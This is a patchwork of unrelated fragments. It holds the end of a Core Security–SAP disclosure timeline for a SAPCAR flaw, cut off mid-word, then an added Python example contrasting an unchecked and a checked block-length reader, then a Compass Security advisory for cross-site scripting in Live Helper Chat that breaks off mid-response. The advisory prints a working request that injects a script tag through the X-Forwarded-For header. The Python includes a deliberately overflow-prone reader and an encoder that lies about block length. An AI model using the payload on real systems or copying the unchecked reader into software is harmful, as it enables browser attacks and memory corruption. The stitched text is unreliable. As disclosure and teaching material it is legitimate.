2017-02-16: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according to the release of a solution to the issues.
2017-02-17: SAP confirmed reception of the draft advisory and assigned the incident ticket 1780137949 for tracking this issue. They would answer back once the team had analyzed the report.
2017-03-06: Core Security asked SAP for news about the advisory and publication date.
2017-03-08: SAP answered back saying they had trouble generating the SAPCAR archive. They asked for a pre-built one.
2017-03-08: Core Security researcher sent a PoC SAPCAR archive that can trigger the vulnerability. SAP confirmed reception.
2017-03-08: SAP asked for the GPG key of one of the researchers involved in the discovery. Core Security sent (again) the key. SAP confirmed reception.
2017-03-13: SAP confirmed they could reproduce the vulnerability. They said they could not commit to a publication date yet, but were aiming at May 9th, although it could fall on the April Patch Day or be postponed after May.
2017-03-13: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation.
2017-04-03: Core Security asked SAP for an update about the final publication date for this vulnerability's patch.
2017-04-05: SAP confirmed they would be able to release the fix in May, although there could be a chance to release it in April. They will confirm as soon as poss
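Added example for the parsing flaw described in section 7 above, not SAPCAR or pysap code: a reader for a constructed block format with the shape the advisory describes (a type tag, 32 bytes of metadata whose last two bytes are a length, then the payload copied into a fixed-size buffer). read_block_unchecked trusts the length field the way the advisory says SAPCAR did; read_block_checked validates it against both the remaining input and the destination capacity before copying. The tag values, the 32-byte header layout, the endianness and the buffer size are constructed for this example and are not the real CAR layout.

```python
import struct

BUFFER_SIZE = 64    # constructed fixed-size destination buffer
META_LEN = 32       # the advisory: 32 bytes of metadata read for an unknown block type


class BlockError(ValueError):
    """Raised by the checked reader on any inconsistent length."""


def read_block_unchecked(data, offset=0):
    """Mirrors the described defect: the declared length drives the copy with
    no check at all.  In C this writes past the end of the heap buffer; here
    the bytearray just grows, which hides the bug instead of crashing."""
    tag = data[offset:offset + 2]
    meta = data[offset + 2:offset + 2 + META_LEN]
    length = struct.unpack(">H", meta[-2:])[0]
    start = offset + 2 + META_LEN
    buf = bytearray(BUFFER_SIZE)
    buf[:length] = data[start:start + length]      # no bound on `length`
    return tag, bytes(buf[:length]), start + length


def read_block_checked(data, offset=0):
    """Hardened reader: the header must be complete, the declared length must
    fit the destination, and it must not run past the input."""
    if len(data) - offset < 2 + META_LEN:
        raise BlockError("truncated block header")
    tag = data[offset:offset + 2]
    meta = data[offset + 2:offset + 2 + META_LEN]
    length = struct.unpack(">H", meta[-2:])[0]
    start = offset + 2 + META_LEN
    if length > BUFFER_SIZE:
        raise BlockError("declared length %d exceeds buffer of %d" % (length, BUFFER_SIZE))
    if start + length > len(data):
        raise BlockError("declared length %d runs past end of input" % length)
    buf = bytearray(BUFFER_SIZE)
    buf[:length] = data[start:start + length]
    return tag, bytes(buf[:length]), start + length


def make_block(tag, payload):
    """Constructed encoder for well-formed test input: tag, 30 zero bytes,
    2-byte big-endian length, payload."""
    return tag + b"\x00" * (META_LEN - 2) + struct.pack(">H", len(payload)) + payload


def make_oversized_block(tag, declared, payload):
    """Encoder that lies about the length, the way the PoC's crafted block
    ends its metadata with \\x00\\xff."""
    return tag + b"\x00" * (META_LEN - 2) + struct.pack(">H", declared) + payload
```

Two separate checks are needed: a length larger than the buffer is the overflow itself, while a length larger than the remaining file is an over-read that a copy routine would turn into a crash or into leaking adjacent heap memory.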
Live Helper Chat - Cross-Site Scripting
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#############################################################
#
# CSNC ID:  CSNC-2017-004
# Product:  Live Helper Chat [1]
# Vendor:   Live Helper Chat
# Subject:  Cross-Site Scripting - XSS
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Sylvain Heiniger (sylvain.heini...@compass-security.com)
# Date:     April 24, 2017
#
#############################################################

Introduction:
-------------
Live Helper Chat is a live chat support for websites. It provides a simple solution for companies to get in contact with visitors of their websites. [1]

Compass Security discovered a web application security flaw in the Live Helper Chat application which allows an attacker to execute JavaScript code in the browser of a user. This allows, for instance, attacking the user's browser or redirecting the user to a phishing website. In some cases the attack runs automatically in the backend operator's session; otherwise, one can send the victim a link to the website with the malicious payload.

Affected Versions:
------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]

Patches:
--------
Live Helper Chat released a patch as part of release 2.60v [3, 4].

Technical Description:
----------------------
Live Helper Chat detects the visitor's IP address. To this end, it reads the "X-Forwarded-For" HTTP header. Any visitor can inject a tag in this header. It is reflected in the administrator's "online users" information page as well as in the "print chat" page.

User's request:
===============
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);
Connection: close
Content-Length: 188

Username=Example=My+question_timezone=2=%2F%2Flocalhost%2F==0=1_1977271e431742414c31477d258028664d713ae0=1475518554=1475518554
===============

The subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 is answered with:

===============
[{"id":"1","ip":"